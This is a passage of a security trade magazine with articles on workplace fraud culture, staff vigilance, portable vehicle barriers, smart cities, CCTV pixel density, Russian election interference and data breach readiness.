will depend a lot, on the strength of the ethical culture being enforced and practiced. It’s nearly impossible to predict whether any given employee will be inclined to commit fraud. However, the environment in which an employee works can be controlled by a company’s leadership in both formal and informal ways to make fraud more difficult and cast it as an affront to the business’ social norms. Most people wish to act as their colleagues do, and, therefore, if the corporate norm is one of zero tolerance for fraudulent activity, the commission of antisocial acts within the context of the business becomes, ideally, inconceivable or improbable. Companies must strive to make their offices and facilities places fool proof where it is hard for an individual to commit fraud and even harder to imagine that he or she could get away with it. It benefits when the company is able to establish a low-risk environment for fraud and provide incentives for ethical behaviour by its executives, managers and employees.
People commit fraud, and because people are social animals, their actions, in great measure, are governed by the culture and environment in
Conduct periodic Risk Analysis
which they find
To create a fraud-resistant environment and culture, Organisations must begin with a thorough risk analysis that should include a review of existing corporate policies, an analysis of internal compliance systems and processes, and an examination of the organization’s communications strategies and practices keeping in mind the varied regional risk profiles, and organizations operations in multiple jurisdictions. These reviews will enable leadership to assess the company’s risk profile holistically. This risk analysis should not be wholly quantitative since such a confined assessment would neither register nor reflect the ecology of the workplace. Ideally, an independent analyst, whose vision would not be clouded by the current culture, could provide open-minded leadership with an understanding of how people in the company are interacting, how managers are relating to employees and how informal information is shared in the workplace. Such an analysis could reveal where pockets of discontent exist, where dysfunctional behaviour is tolerated and where there are cracks in more formal compliance processes — cracks that breed fraud. Companies can control those environments by defining both formal and informal procedures in place and by constantly reviewing to understand the mostly unseen, unexplored ecology of their organization which is a “must have” culture more importantly.
Live the Corporate Culture A positive and ethical work environment prevailing in an organisation can prevent employee fraud and theft. There should be a clear organizational structure, written policies and procedures and fair employment practices which are inculcated and practiced throughout. An open-door policy can also provide a great fraud prevention system as it gives employees open lines of communication with management. It remains that Business owners and senior management should lead by example and hold every employee accountable for their actions, regardless of position and that could set the tone to bring in the required culture.
Australian Security Magazine | 11
Cultivating vigilant behaviour in people Statistics show that a large number of data breaches are due to employee mistakes
instead of hackers’ savvy. These mistakes include storing
sensitive information on unencrypted hard drives, accessing said information on non-secure devices and ignoring security protocols when opening attachments or sending information over the web. This two part series provides a framework for cultivating vigilant behavior in people. By Louis Yau
12 | Australian Security Magazine
inging praises of vigilance, which entails a high level of alertness and avoidance relative to potential risks of loss, as well as subsequent peace of mind, is easy enough. Yet there continues to be a worrying deficit of vigilance in societies and organizations. This issue is alarming, especially in the wake of increasingly sophisticated and multi-lateral threats. Security practitioners and systems alone cannot offer a panacea. The statement “Security is everyone’s responsibility” is a cliché but also quite true. People must take security into their own hands and minds, to be more precise. While it seems logically sound that people should be more vigilant, this is not reflected in reality. The spree of crimes and accidents upon the release of the popular phone game Pokemon Go was largely due to players being completely oblivious to their surroundings. This lack of vigilance led to them walking off cliffs and walking into muggings , to name a few examples. A lack of vigilance is not limited to phone obsessed millennials however. Scams, such as the
infamous Nigerian Prince email, continue to net in millions despite repeated government and bank warnings about them. While it cannot be denied that criminals are getting smarter, ultimately the best defense is vigilance and common sense. The Change Curve While it may be argued that embracing vigilant behavior is logically sound and that people shouldn’t be resistant towards change, the reality is that people don’t always think this way. A survey of 3000 employees found that approximately 60% of them did not like their compliance training, with only 44% believing that their training has ‘raised their awareness and understanding of compliance and ethics’ . Even the 44% positive response rate is questionable since many employees answer survey questions based on their perception of what may be the most desirable answer for their employer while spending as little time as possible on completing the survey.
While some may argue that compliance and vigilant behavior are different, they both consist of extra steps designed to proactively avoid negative consequences that damage not just the individual, but potentially the entire organization. The change curve is a psychological model created by psychiatrist Elisabeth Kubler-Ross. According to her model, human beings are naturally antagonistic towards change, especially if the change is perceived as negative. In the case of extra vigilance, which often involves rechecking or evaluating actions, it is not improbable for people to feel that vigilant behavior equates more work, hence making it negative. The aim of the change curve is to highlight the multiple phases people go through before accepting a change. Using this model, it is possible to predict the behavior exhibited at each phase and tailor methods to facilitate a faster acceptance of change. The curve can be split into the three stages. The following sections will examine each stage in detail, focusing on how to expedite a stable transition.
infected internet ads and email attachments. The Educrypt program was an attempt by an anonymous developer to warn people about ransomware. Upon downloading and running the program, the computer is encrypted and a message reprimanding the user for their lack of vigilance is shown on the screen. The decryption key is kept on the computer, along with instructions for how to decrypt the files for free . Simulations are a way of providing experience, and hence reducing the optimism bias, without experiencing the negative consequences associated with it. About the Author Louis Yau is a student of International Relations at the University of St Andrews. His research interests include transnational security risks and threat mitigation, with a focus on South-East Asia. He is currently a research assistant in a comprehensive study of post-conflict peace-building in the Philippines, supported by the University of St Andrews.
First Stage The principle emotions associated with the first stage are shock and denial. While shock tends to pass fairly quickly, denial can be long-lasting and damaging. The main danger is the spreading of the belief that ‘the previous system was fine’ because ‘it will never happen to me’. This is known as the optimism bias , and can be a very challenging mentality to overcome. While experiencing an event reduces the associated optimism bias , it is best to avoid loss as much as possible, even if it is educational. The best alternative is to provide a logical explanation, with statistics and facts, as to why the previous system is flawed. There are several ways of doing this, but most cases are variations of the following: • Our new system will likely lead to higher gains. • Our new system will likely lead to lower losses. • Our old system will likely lead to higher losses. • Our old system will likely lead to lower gains. Of the four explanations, the third one is the most effective. This is due to ‘prospect theory’ or the ‘loss aversion’ cognitive bias, whereby humans are inclined to be risk-willing when avoiding losses and risk-adverse when obtaining gains. Risk in this case refers to the probability of them using a new system. Thus, explanations should highlight the potential losses incurred by original system of non-vigilance in order to improve the chances of people accepting that the new system, that of vigilant behavior, is more effective than its predecessor. Yet sometimes this isn’t enough. As stated above, logic and rationality does not always work. Sometimes people refuse to accept logic. An alternative would be simulations. These disaster simulations provide a more realistic illustration of the consequences of non-vigilant behavior. While there are several companies which offer this service, a program called Educrypt has been educating unwilling participants for a few months now . Educrpyt is a type of ransomware, or a malicious software that encrypts sensitive information and demands a ransom for the decryption key. Ransomware is a quickly growing criminal enterprise, with a significant portion of companies losing money due to paying the ransom . The program is spread through a variety of means, including
Australian Security Magazine | 13
Ten minute traffic security deployment By Greg Hamm Delta Scientific, Vice President-Marketing and Sales
14 | Australian Security Magazine
n December 19, 2016, the news exploded with information about a vehicle attack on a Christmas market in Berlin that killed at least 12 and injured more than 50. Less than a month before, the U.S. State Department had warned about such attacks in public places throughout Europe, saying that extremist groups including the Islamic State and Al Qaeda were planning to focus on such locales during the Holiday Season. Indeed, both terrorist groups have called on followers to use trucks in particular to attack crowds. On July 14 (2016), a truck plowed into Bastille Day vacationers in Nice, France, killing 86 people. Four months later, on November 28, 2016, a car ramming attack and mass stabbing occurred in the United States at 9:52 a.m. EST at Ohio State University's Watts Hall. The attacker, Somali refugee Abdul Razak Ali Artan, was shot and killed by the first responding OSU police officer and 13 people were hospitalized for injuries, nine of them struck by the vehicle. Luckily, nobody was killed. With vehicles used at weapons becoming a popular terrorist strategy, how can security management control traffic at a temporary event with certified crash equipment that can be simply towed away when the occasion is over – from protecting farmers’ market shoppers from an errant vehicle or a political event from car and truck bombers? Today, that question can be answered simply – with portable barriers. Moveable self-contained barricades can be towed into position to control vehicle access within 15 minutes to answer the need of organizations that quickly require a temporary barricade system to address a specific threat or secure a facility during special events. They were created for military checkpoints in Afghanistan and Iraq to provide another level of force protection. Three lengths -12, 16 and 20 feet – have been built over the years. These mobile deployable vehicle crash barriers carry a M40 rating, stopping 7.5 ton vehicles traveling 40 mph. No excavation or sub-surface preparation is required. Once towed into position, the portable barricade uses DC-powered
hydraulic pumps to unpack and raise and lower itself off its wheels. There is no hand cranking. Wheels are stored along the sides and the vehicle ramps fold out, completing the implementation. To move the barrier from that spot to another, the procedures are just reversed. Who in law enforcement uses mobile, temporary barriers? Today, over 1,000 of the mobile deployable vehicle crash barriers are being utilized throughout the world. Many of the MP5000s are being used in the Middle East to protect US troops from truck bomb attack. However, it didn’t take long for municipal law enforcement to discover them. Within months of introduction, the Los Angeles Police Department obtained the barriers for a host of duties. During heighted security threats, the MP5000s can easily be installed to create a safe zone at the outer areas surrounding the Parker Center headquarters. They are also used for special events, such as Hollywood awards ceremonies including the Academy Awards, major sporting contests, high-profile trials, or in the potential event of riots or natural disasters such as earthquakes to provide extra security where it is needed. Ordered by the Secret Service and provided through Global Access Control Systems (Pittsburgh), certified crash barriers also protected attendees at both the Republican and Democratic Conventions this past summer in Cleveland and Philadelphia. The fact that these barriers were ordered well in advance of the tragedy in Nice is indicative of the great foresight and planning that is undertaken by the United States Secret Service. Portable barriers were also at both political conventions in 2012 in Tampa and Charlotte as well as at the Presidential Inauguration events January 21, 2013, to aid police and military officers in protecting the president, congressional leaders, judges, journalists, other attendees and onlookers.
During the Presidential Inauguration events, not one vehicle got into position to cause harm. In September of 2015, 18 Delta Scientific 12- and 16foot mobile deployable vehicle crash barriers helped police and security personnel protect Pope Francis as he traveled to various venues in Washington, D.C., Philadelphia and New York. During the Papal visit engagements, which were witnessed by millions, again, not one vehicle got into position to cause harm. The 12- and 16-foot mobile deployable vehicle crash barriers have also helped police and military officers protect 60 heads of state and other global leaders, over 2,000 journalists, other attendees and onlookers at the Chicago NATO (North Atlantic Treaty Organization) Summit. Ten 12- and 16-foot MP5000 mobile deployable vehicle crash barriers additionally helped the 4,000 police and military officers that protected participants at the Pittsburgh G-20 Summit. Requests from law enforcement for a smaller model Although the original portable barriers were doing what they promised, a more commercial barrier that could also be towed into place by something smaller than a truck was requested. Light enough to be towed by a golf cart and set up in only 10 minutes, the new DSC1000 portable barrier provided an ASTM crash rating of P40, which means it will stop a 5,000-pound vehicle going 40 mph. With no foundation or electrical hook-up needed, two people can set up and take down the new DSC1000 barrier in minutes. The self-contained power system provides all the power necessary to raise and lower the unit onto its trailer and open and close the barrier. This battery-powered system re-charges with a solar panel or external means. Controls can be locked or operated at the barricade or remotely. Differing from the “hard stop,” wanted with antiterrorist barricades, the Soft Stop technology of the DSC1000 decelerates and stops the vehicle over a short distance. This is important because, in many cases, the tragedies that the DSC1000 will negate are accidents. Authorities want the vehicle stopped but they also want to minimize injury to the driver. Penn State University uses seven of these barriers for home football games and special events. Like similar applications at the University of Michigan, Ohio State and others, PSU is able to quickly deploy these barriers at strategic sites around the facility. After the event, they are quickly knocked down and towed to another location. The United Kingdom’s embassy in Budapest, Hungary, not only uses the DSC1000 barrier to protect its compound from charging vehicles but they are placed to create a sallyport to tightly control traffic into the embassy. The first barricade is lowered to let in a car, while the barrier in front of the car stays up. The one in back then raises and the car is sandwiched between them. Once searched and OK'd, the second barricade lowers and the car is allowed to enter.
placed into an organization’s real assets budget because they are permanently installed into the ground, becoming part of the property. Such budgets can often create complex purchasing scenarios for an agency. However, purchasing portable barriers is no different than buying protective vests for personnel or new sets of wrenches for the maintenance department. For one time uses, a lease plan has been created where organizations can simply lease the portable barriers, use them, pack them up and return them. Delta always keeps an inventory for purchase and quick delivery at their manufacturing facility in Palmdale, Calif. That’s because, in many cases, they are needed for events that come up quickly, such as politician or celebrity visits and other unexpected incidents. There’s a Portable Barrier to Match Any Need Although the MP5000 and DSC1000 are the primary models of portable barriers, there are other models for special needs. The bottom line is that there is a crash rated portable barrier for any temporary entrance that needs to both allow authorized vehicles through but stop unauthorized vehicles from getting in. Installing quickly and easily, they provide increased security and safety. If you start installation in the morning, you can have protection by lunch.
Protecting the Pope from attack in Philadelphia
Moveable barrier at G2 Summit in Pittsburgh
Procurement Often Simplified From a purchasing standpoint, it can be easier to buy portable barriers than permanent barriers. The latter are oftentimes
Penn State is one of a number of Big 10 universities using portable barriers on football weekends.
Australian Security Magazine | 15
Smart City Series
What it takes to be a 'Smart City'
I By Morry Morgan APAC Sales 'Guru' and Published Author on Sales and IoT
16 | Australian Security Magazine
t may come at no surprise that this year Singapore was named Global Smart City. The city is a metropolitan marvel that supports 5.4 million inhabitants, within a concrete and actual jungle, and even boasts a reservoir within the CBD; one that incredibly supplies 10% of Singapore's water needs. Singapore was listed ahead of Barcelona, London, San Francisco and Oslo, with 'technology', 'transport', 'energy' and the 'economy' all main themes within the Worldwide Smart Cities white paper, produced by Juniper Research. So too was 'open data'. But then again, 'openness' is easier for some cities than for others. Faith in the government is high in Singapore, where Prime Minister Lee Hsien Loong launched the Smart Nation program in 2014. Since its launch, the small island city-state has deployed an undetermined number of sensors and cameras across the country that has allowed the government to monitor cleanliness of public spaces, the density of crowds, and even in the not so distant future, the precise movement of every locally registered vehicle. Very smart, but a bit too 'Big Brother' perhaps? The upside of such a monitored society is Singapore's low crime rate - ranked 118 out of 119 countries. Smart cities are safer cities. This is certainly the belief driving India's own '100 Smart Cities Initiative'. Within it's 10 core infrastructure elements is included "safety and security of citizens, particularly women, children and the elderly." India is serious about creating smart cities, and this endeavour is being supported by IBM. This year, three Indian cities (Allahabad, Surat and Vizag) were part of 17 international cities selected to benefited from IBM Smarter
Cities Challenge. The program, initiated by IBM in 2010, has since deployed over 800 top experts and has helped more than 130 cities around the world 'do more with less', 'bridge silos of information', 'grow civic engagement with the community' and 'make better investment decisions in infrastructure'. According to IBM, these are the main talking points that make a smart city. And when IBM talks, others listen, because this drive to become smarter is a fantastic business opportunity. One such company that is betting on the smart city trend is HERE. The company, co-owned by German auto giants Audi, BMW and Daimler, includes the consumer app, called Here WeGo, that converts data to provide up-to-the-minute information on current traffic conditions and incidents, much like Google Maps. However, where HERE differs from Google is with its smart city, next generation automotive services. Through the 'Internet of Things' (IoT), data created by one vehicle, for example, by heavy breaking before a pothole in the road, is shared across the vehicle network, warning other drivers of the upcoming road hazard. Modern cars have a myriad of onboard sensors, measuring everything from braking, windshield wiper speed, GPS and even use of hazard lights. HERE takes this assortment of independent data, and combines it through the IoT and data analytics to create, what it refers to as 'cooperative mobility'. The outcome is a smarter car, smarter road network, and ultimately a smarter city that can boast smoother traffic, reduced congestion and accidents, less frustrated drivers, and very soon fully autonomous vehicles.
Smart City Series
Which brings us back to Singapore, and the location of the world's first self-driving taxis that are already picking up passengers. In August this year, selected members of the public were able to hail free taxis via their smartphones, and travel within a two kilometre block. While multiple companies, including Google and Volvo, have been testing self-driving cars on public roads for several years, nuTonomy is the first to offer rides to the public. It even beat Uber by a few weeks, which now offers rides in autonomous cars in Pittsburgh. For now, Singapore's nuTonomy taxis are only operating within a small business and residential district called 'onenorth', beside the National University of Singapore (NUS). Pick-ups and drop-offs are limited to specific locations, and while the car is autonomous, just like Uber's Pittsburgh study, a standby driver is present - for now. By 2019, another player in the autonomous vehicle race, Delphi Automotive, plans to enter the 'shared economy' in Singapore and eliminate drivers completely, as well as steering wheel and pedals. Delphi is already planning for a 100% driverless taxi fleet of 50, which could reduce an average $3-a-mile ride to only 90 cents. This movement from an 'owned' to 'shared' economy, it would appear, is a smart city prerequisite. The Nokiasponsored report, The Smart City Playbook by Machina Research, includes 'shared' within its six 'Ss' for a smart city's success, alongside smart, safe, sustainable, secure, and scalable. The report was based on a study of 22 cities of varying sizes and geographies at different levels of planning, testing and deployment. The challenge of 'shared' is that it requires an open partner
ecosystem allowing for a diverse mix of technology vendors, application developers, service providers, system integrators, utility companies, research institutions and many others. For this reason, smart cities must also have smart leaders. Creating smart cities requires budgeting, planning, negotiating, and of course a deep understanding of human behavior. Technology serves a role, to a point, after which human decision making is necessary. And good decision making is only possible when all the information is 'shared' - meaning intra-agency politics and competitive businessto-business behavior must be minimised. That requires smart leadership. Once shared, however, simple data becomes incredibly powerful, because it can lead to cost savings, increased efficiencies and ultimately a stronger economy. Which is what Singapore needs right now. A slump in oil prices as well as in global seaborne trade has greatly affected the island-nation's exports. Imports remain high, with the tiny nation importing over 90% of the food that its citizens consume. But this isn't why Singapore subscribes to IBM's Smarter City Challenge of 'do more with less'; this has always been Singapore's mantra. It's already investing in high-tech, indoor farming, that is able to produce about 54 tonnes of vegetables a year from as little as 344 square metres. And with vertical gardens, the sky is literally the limit. With most of The Smart City Playbook's 'Ss' ticked off, it's only 'sustainability' that Singapore needs to overcome in order to become the unquestioned Global Smart City. But mark my words, "Grown in Singapore" is coming to a green grocer near you!
Australian Security Magazine | 17
CCTV Feature Series 2017
About pixel densities and what they mean By Vlado Damjanovski CCTV Specialist ViDi Labs Pty Ltd
18 | Australian Security Magazine
n IP surveillance system may be used to observe and protect people, objects and people’s activity inside and outside the objects, traffic and vehicles, money handling in banks, or games in casino environment. All of these objects of interest may have different clarity when displayed on a workstation screen. The image clarity depends primarily on the camera used, the imaging sensor, its lens and the distance from the object. There is one parameter in IP CCTV that expresses the image clarity in a simple way with just one parameter - Pixel Density. The Pixel Density is usually expressed in pixels per metre (Pix/m), at the object plane, although it can be expressed in pixels per foot. Pixel Density in IP CCTV sense should not be confused with the Display Pixel Density quoted by various LCD display manufacturers which defines the screen density, in Pixels Per Inch (PPI). The advantage of expressing object clarity with its Pixel Density is that it combines the sensor size, pixel count, focal length and distance to the object in just one parameter. This is one of the main functionalities of the ViDi Labs Calc application. When using Pixel Density metrics all variables are included and makes it universally understandable what details you will get on an operator’s workstation screen. When designing a system, or a tender for a system, one can request Pixel Density for a particular image quality. So, instead of asking for a 6 mm lens for your camera in a particular location, for example (which means nothing without knowing the camera sensor it is used on), it would be much more useful if a particular Pixel Density is defined for the view. This will then be used to calculate the required lens for the particular camera used and the distance from the object. This will guarantee the clarity of the image (assuming the lens is focussed optimally and there is sufficient light, of course). This can be done very easily with the ViDiLabs Calc. Pixel Density can be used for any object that IP CCTV user might be interested in: face, licence plate, playing card, money and similar. Let us now explore how many pixels per metre are attributed to various objects. One of the most commonly referred pixel densities is for Face Identification. Face Identification in CCTV means sufficient clarity of the image so that one can positively identify who the person on the screen is. According to Australian Standards AS4806.2, for Face Identification in analogue CCTV, we require 100% person’s height to fit in the monitor screen height. The details of 100% person’s height on a screen have been tested many times and it’s been verified that they are sufficient for such a person to be identified. We know that PAL signal is composed of 576 active TV lines, so, according to AS4806.2, a person’s height would occupy all of the active lines to make it 100%. Head occupies around 15% of a person’s height, which is equivalent
to around 86 lines (576 x 0.15 = 86.4), which is the same when converted to pixels (assuming recording is made full TV frame mode, which is equal to two TV fields). If we agree that an average person height is 170 cm, the head would occupy around 25 cm of that. The Pixel Density at the object, which is required to make a positive Face Identification according to AS 4806.2, can be calculated to be 86 pixels at 25 cm of head height. Since there are 4 times 25 cm in 1 m of height, this becomes 4 x 86 = 344 pix/m. So, one can say that with pixel density of 344 pix/m at the objects plane it should be possible to positively identify a face, according to AS4806.2. Some other standards may require different values, and one such (newer) standard is the IEC 62676-4, which defines 250 pix/m to be sufficient (i.e. suggests that with slightly lesser pixel density than the AS standards one should be able to identify a person). Clearly, this number is not fixed in concrete, and it will depend on the observing ability of the operator, as well as other parameters (lens quality, illumination, compression artefacts, etc…), but the key is to understand that such a Pixel Density can be calculated for any type of camera, irrespective if that is SD, HD, 4k or any other format. Any number for Face Identification Pixel Density can be specified in the ViDiLabs Calc, although the shortcut buttons are designed to show the IEC standard suggestion of 250 pix/m. The next image quality down, as defined by the standards is for Face Recognition. The details of Face Recognition image should be sufficient to recognise the gender of a person, what he/she is wearing and possibly make an assertion of who that person might be, if picked from a bunch of people that have already been identified somewhere else (e.g. passport or drivers licence photo). This is basically an image with half the pixel density to the Face Identification, which according to AS4806.2 should be around 172 pix/m, while IEC62676-4 suggests 125 pix/m. The following examples are from real systems: Similarly, pixel density can be defined for vehicle licence plates visual recognition (not software automatic LPR). In the AS 4806.2, this is defined as 5% characters height on a display screen, which is around 30 TV lines (pixels) (to be very accurate 576 x 0.05 = 28.8). If we assume that a typical Australian number plate has characters of around 90 mm in height, than this equates to 11 x 30 pixels = 330 pix/m. The number 11 is obtained from dividing 1000 mm (1 m) with 90 mm. One may say that for visual licence plates recognition similar pixel density is required as for face identification. When money and playing cards are observed in banks or casinos, many practical tests have shown that at least 50 pixels are required across the notes or cards longer side in order to positively identify the values. Standard playing cards
CCTV Feature Series 2017
dimensions are B8 according to ISO216 standard, which is 62 mm x 88 mm. So, we need the 88 mm card length to be covered with at least 50 pixels for proper identification. This means around 550 pix/m (1000 mm / 88 mm = 11 => 50 pix x 11 = 550 pix/m) should be sufficient for playing cards. We may require slightly better pixel density for identifying money, since notes size is typically larger than playing cards, so if one takes the Face Inspection pixels density of 1000 pix/m, it should attain pretty good identification, although as it can be seen from the real life example below, even 770 pix/m might be sufficient. So the following table can be used as a rough guide for various pixel densities.
Minimum required pixel density (Pix/m)
Object Inspect (IEC-62676-4)
Face Identification (AS-4806.2)
Face Identification (IEC-62676-4)
Face Recognition (AS-4806.2)
Face Recognition (IEC-62676-4)
Intrusion Detection (AS-4806.2)
Licence Plates visual identification (AS-4806.2)
Casino chips (39mm)
About the pixel blur effect of moving object Most objects that we observe in IP CCTV, such as people and vehicles, are not static, but moving. When objects are moving their image will never be sharp and clear like static objects. The faster the objects moves the more blurry it will appear. The closer the moving object is to the camera, the more blurry it will appear. The longer the camera exposure is the more blurry the object will appear. The camera sensor size and focal length of the lens play also a role in how blurry the image will appear. And finally, the angle under which such an object moves relative to the camera viewing direction also plays a role. So, there is a very complex correlation between all the parameters mentioned above. The ViDiLabs Calc has been designed to calculate the effects of such a motion in the recorded video, and show it as pixel blur. To put it simply, this calculation shows how smudged a moving object image is.
Face Identification as per AS4806.2
Face Recognition as per AS4806.2
This blurriness is an unwanted effect, as it makes it difficult to recognise the details of the moving object even if the camera is in focus at that point. By knowing how many “blurry pixels” will appear for a given object speed and the camera exposure setting, using the ViDiLabs calc it is possible to find the camera Exposure setting which will produce lesser or acceptable sensor blur. To produce “live” video in CCTV, we require at least 25 fps (or 30fps). Each of the TV frames are therefore typically exposed at 1/25s = 40ms (in analogue 1/50s for TV Fields). In the bright daylight, the auto iris lens closes to reduce the amount of light for a correct exposure. If it is very bright, then the sensor electronic exposure kicks in. In low light, the auto iris lens opens up fully, and if this is not sufficient, the sensor electronic exposure increases further (this is usually called “integration”). Here are some practical examples. If the object is moving at an angle relative to the camera optical axis, the same rules apply, but this time the projected speed “v” has to be used as a “real speed” of the moving object. The projected speed can be found as a “cosine” of the speed “v” relative to the angle alpha that is between the moving object direction and the perpendicular direction to the optical axis. For example, if a bicycle rider moves with 40 km/h at an angle of 30˚ relative to the optical axis, this would produce an angle of 60˚ between the direction of movement of the bicycle rider and the perpendicular plane to the optical axis. Then, the cos 60˚ = 0.5, which means the projected speed of 40 km/h will be 20 km/h for the purpose of calculating the pixel shift. To continue with the same example, let’s assume the bicycle rider is passing at 100 m away from the camera, and riding at the mentioned angle above. Let’s also assume we have an HD camera, with 1/3” sensor and have 8 mm lens installed. If we use the normal camera shutter of 1/25 s to produce live video, the resulting object motion blur from such movement will be 7.1 pixels. Over 7 pixels of smudged moving image might be just too much to be able to recognise the rider. So, we need to reduce the shutter speed so that there are much less blurred pixels. Using 1/250s shutter exposure will bring the blurriness to less than 1 pixels (0.7 in our example) which is much more acceptable.
To produce “live” video in CCTV, we require at least 25 fps (or 30fps). Each of the TV frames are therefore typically exposed at 1/25s = 40ms (in analogue 1/50s for TV Fields).
Money and play cards shown above with 770 pix/m
Australian Security Magazine | 19
Cyber Security Cover Feature
Russia's Cyber War: Options before the US
U By Sarosh Bana APSM Corespondent
S intelligence’s findings holding Russian President Vladimir Putin directly responsible for a cyber campaign that ensured Republican Donald Trump’s victory in the 2016 presidential election betrays Washington’s weakness as much as Moscow’s deceit. After initially discounting Russia’s manipulation, President-elect Trump accepted the findings and spoke of possible action in response, his incoming chief of staff Reince Priebus said on January 8. Priebus, however, did not clarify the line of response contemplated or whether Trump agreed specifically on Putin’s role in this regard. In the 20-page declassified version of its report: Assessing Russian Activities and Intentions in Recent US Elections, released on January 6, the US Intelligence Community - comprising the Central Intelligence Agency (CIA), Federal Bureau of Investigation (FBI) and National Security Agency (NSA) - details how Putin ordered an influence campaign aimed at the 2016 US presidential election. The report discloses Putin and his government’s “clear preference” for Trump that motivated the denigration of his Democrat rival, Secretary Hillary Clinton, and ultimately harmed her electability and potential presidency. The most alarming assessment, however, concerned “Russia’s goals” to undermine public faith in the US democratic process. The report cited Moscow’s cyber onslaught as not only the most recent expression of its longstanding desire to undermine the US-led liberal democratic order, but also demonstrative of “a significant escalation in directness, level of activity, and scope of effort compared to previous operations”. Such an evaluation unequivocally signifies a direct Russian attack on the US and its interests. After all, universal suffrage is the underpinning of the democracy the US is, and its concerted subversion was aimed at advancing a sort of ‘regime change’, no less. If Moscow can install a US President it desires with such alacrity, Washington stands completely vulnerable to such excesses. Russia has simultaneously proved it can subjugate its most powerful adversary without firing a single shot or launching a single missile. “Putin’s public views of the disclosures suggest the Kremlin and the intelligence services will continue to consider using cyber-enabled disclosure operations because of their belief that these can accomplish Russian goals relatively easily without significant damage to Russian interests,” the report notes. American intelligence determined that its Russian
20 | Australian Security Magazine
counterpart researched US electoral processes and related technology and equipment since early 2014, gaining access to Democratic National Committee (DNC) networks as early as in July 2015 and maintaining that access until at least June 2016. It also found some Russian paid social media users or ‘trolls’ starting to advocate for Trump by December 2015. It besides established that Russia’s General Staff Main Intelligence Directorate (GRU) targeted cyber operations at the US election from March 2016, collecting against primary campaigns, think tanks, and lobbying groups it viewed as likely to shape future US policies. The US intelligence report makes no mention of when the Obama administration was made aware of the Russian campaign, though President Obama likely knew this early enough through the intelligence-focused Presidential Briefs scheduled for him daily at the White House. Yet, ‘retaliation’ came only on December 9 when he ordered a full review into the malicious cyber activity. Twenty days later, once the intelligence report was out, he issued an executive order providing additional authoritative response to cyber activity aimed at interfering with or undermining the US’s election processes and institutions, or those of its allies or partners. By that new authority, the President sanctioned
Cyber Security Cover Feature
'if Congress were to pass a Constitutional amendment for ratification by 38, or threefourths, of the 50 States. The US’s Supreme Court too could order a re-vote if it ascertained massive fraud in the electoral process.'
GRU, Russia’s military intelligence, and FSB, the civilian security service, four GRU officers and three companies that provided material support to GRU’s cyber operations. Obama also ordered the expulsion of 35 Russian diplomats and the closure of two “recreational facilities” in New York and Maryland that were allegedly used for Russian intelligence activities, pledging further actions, “some of which will not be publicized”. It is curious why this reprisal was so late in coming. It raises questions whether US intelligence had failed to adequately gauge the Russian campaign early enough, or it had the knowledge but failed to inform the Obama administration in time, or if it did inform in time, Washington had been unable to counter, or incapable of countering, the cyber intrusion or even control the damage it was causing. If the Obama administration now concludes that the election result has been completely stage-managed by a hostile external power, it must redress this fraud on its nationhood by using the option of declaring the 2016 elections null and void and seeking a re-election. After all, the winning candidate, Trump, too has acknowledged Russian meddling. As Moscow has denied any intervention and
called for evidence of its involvement, Obama must heed the call by all Democratic senators on the Senate Intelligence Committee to declassify the full intelligence report. While the US Constitution provides no scope for re-election, it can be allowed if Congress were to pass a Constitutional amendment for ratification by 38, or three-fourths, of the 50 States. The US’s Supreme Court too could order a re-vote if it ascertained massive fraud in the electoral process. Washington can also well approach the United Nations and its International Court of Justice under Article 2(4) of the UN Charter. The Article proscribes the threat or use of force by all UN members against the territorial integrity or political independence of any state. The UN Security Council can take or authorize measures of collective enforcement against the aggressor, the International Court identifying ‘force’ as regardless of the weapons employed. This would include cyber operations, once their effects are deemed comparable to armed aggression. The Security Council’s responsibility extends to maintaining international peace and security in cyberspace. Any further inaction on this cyber war will only embolden the assailant and render the US vulnerable to greater hostility in future.
Australian Security Magazine | 21
Are you ready for your next data breach? How confident are you in protecting your assets from a confidentiality, availability, and integrity breach?
By Boaz Fischer
22 | Australian Security Magazine
f anything, the NSA breach by Edward Snowden just shows that none of us are ready. In simple terms, most organizations find it challenging to appropriately allocate investment and resources towards effectively mitigating confidentiality, integrity or availability breach. What do I mean by this? Most organizations invest heavily in security technologies and mistakenly focus on achieving high levels of “availability” as a best practice because Service Level Agreements are built around this. However, they neglect to implement appropriate security strategies for protecting confidentiality and integrity. This is a recipe for disaster. “Availability” does not equate with “security”. Take, for example, the so-called Denial-of-Service attack on the Australian Bureau of Statistics (ABS) census website in August 2016. Thousands of Australians were prevented from taking part in this census (including myself ) which overloaded the website. Attacking “availability” in this way certainly left an embarrassing dent on this government-led initiative which may in turn impact any future online government projects (such as online voting) for many years to come. And then there’s the Red Cross Data Breach that occurred in October 2016. Personal data belonging to 550,000 blood donors were leaked from the Red Cross Blood Service. This should never have happened to an organization responsible for storing and protecting highly sensitive, personally identifiable information (PII). We all make mistakes. We’re human. However, leaving sensitive data exposed on a public web server is just about as irresponsible as it gets when it comes to security fumbles.
Where are the necessary controls and checks? The potential ramifications of exposing donors’ data include anything from identity theft to blackmail. Worse still, people might become dissuaded from donating blood in future due to a fear of their own personal details being compromised. A breach of “confidentiality” is a serious issue. Lives are at stake and many executives who hold sensitive information simply do not understand the repercussions. What’s alarming is that most organizations do not even know where their most sensitive data are located, let alone what they contain or their level of sensitivity …another recipe for disaster. Digital collaboration is at the heart of every business process; files are created, stored, and shared at a rapid pace. Yet it seems nearly impossible to keep track of who has and needs access to all of this information, and who doesn’t. Are you on top of your strategy for protecting your sensitive data? Organizations tend to think that their data access is under control, but dig a little deeper and holes start to appear. Most organizations grant access readily, yet revoke it infrequently. Don’t assume that your Human Resources team is the only group of internal employees who can see the HR data, or that an employee who left the company last month has had all of his/ her permissions revoked. This is rarely the case. Let’s be clear- an attack on data “integrity” can be highly challenging to identify or block. Hidden within your large
volume of daily system changes are a few data that can impact the organization’s operations and. These include unexpected changes to a file’s credentials, privileges, the hash value, and changes that impact a configuration’s values or ranges, and properties to fall out of alignment with your security policy. In a recent survey conducted by CEB, it’s been found that: 90% of employees violate policies set up to prevent data breaches. Why? When convenience and productivity are prioritized over security, employees often put sensitive data at risk while trying to simply get a job done. We also know that 90% of all incidents are caused by people (Verizon 2015 Data Breach Incident Report). Whether it’s due to carelessness or malicious intentions, the greatest risk to your organization is your internal employees, privileged IT Users, and 3rd-party vendors. Therefore, when establishing a protection strategy plan for your assets, it is crucial to address the user-based risks and to invest in confidentiality, integrity and availability in equal measures.
